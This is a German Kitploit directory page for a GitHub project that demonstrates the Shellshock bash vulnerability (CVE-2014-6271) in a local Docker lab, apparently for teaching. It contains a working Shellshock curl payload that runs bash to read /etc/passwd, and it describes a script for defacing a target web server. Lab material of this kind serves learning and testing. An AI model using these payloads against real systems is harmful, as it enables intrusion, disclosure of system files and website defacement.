Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6271 — Projekt zur Präsentation einer CVE (ShellShock) mit PDF, technischer und reproduzierbarer Demonstration. | Kitploit
Tools/GitHubGitHub/radyio/cve-2014-6271
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubradyio/cve-2014-6271

CVE-2014-6271

Projekt zur Präsentation einer CVE (ShellShock) mit PDF, technischer und reproduzierbarer Demonstration.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2014-6271

Beschreibung

Dieses Projekt ermöglicht die Reproduktion der Sicherheitslücke CVE-2014-6271, auch bekannt als Shellshock. Shellshock ist eine Sicherheitslücke in Bash, die die Ausführung von bösartigem Code über Umgebungsvariablen ermöglicht.

Ziel dieses Projekts ist es, die Auswirkungen dieser Sicherheitslücke in einer Docker-Umgebung zu demonstrieren.

Voraussetzungen

Stellen Sie vor dem Start sicher, dass Docker auf Ihrem Rechner installiert ist. Sie können Docker hier herunterladen.

Installation und Ausführung

1. Docker-Image erstellen

Erstellen Sie im Projektverzeichnis das Docker-Image mit folgendem Befehl:

root@kitploit:~
docker build -t ['image name'] .

Ersetzen Sie ['image name'] durch den Namen, den Sie dem Docker-Image geben möchten.

2. Docker-Container starten

Nachdem das Image erstellt wurde, starten Sie einen Container aus diesem Image mit folgendem Befehl:

root@kitploit:~
docker run -it --rm -p 8080:80 ['image name']

Dadurch wird der Dienst auf Port 8080 Ihres lokalen Rechners verfügbar gemacht.

3. Auf die Anwendung zugreifen

Öffnen Sie Ihren Browser und rufen Sie http://localhost:8080 auf. Sie können das Verhalten der Anwendung beobachten und die Sicherheitslücke testen.

4-1. Die Sicherheitslücke ausnutzen

Führen Sie in einem anderen Terminal folgenden Befehl aus, um die Sicherheitslücke auszunutzen und den Inhalt der Datei /etc/passwd zu lesen:

root@kitploit:~
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable

Dieser Befehl sendet einen speziell konzipierten user-agent-Header aus, um Shellshock auszunutzen. Wenn die Sicherheitslücke korrekt reproduziert wird, wird der Inhalt von /etc/passwd in der Terminalausgabe angezeigt.

4-2. Die Sicherheitslücke ausnutzen (Skript exp_deface.sh)

Dieses Skript ermöglicht es, eine Ziel-Webseite zu defacen. Die Sicherheitslücke beruht auf einer fehlerhaften Konfiguration von CGI-Skripten, die die Ausführung beliebiger Befehle auf dem Server erlaubt.

Voraussetzungen: Stellen Sie sicher, dass das Ziel anfällig für den ShellShock-Fehler ist. Stellen Sie sicher, dass Sie die erforderlichen Berechtigungen haben, um den Exploit an diesem Ziel zu testen.

root@kitploit:~
./exp_deface.sh <ip> <port>

./exp_deface.sh localhost 8080

Sicherheit

Wichtig: Diese Sicherheitslücke darf nur zu Test- und Demonstrationszwecken in einer kontrollierten Umgebung eingesetzt werden. Verwenden Sie dieses Projekt nicht in Produktionsumgebungen.

Tool herunterladen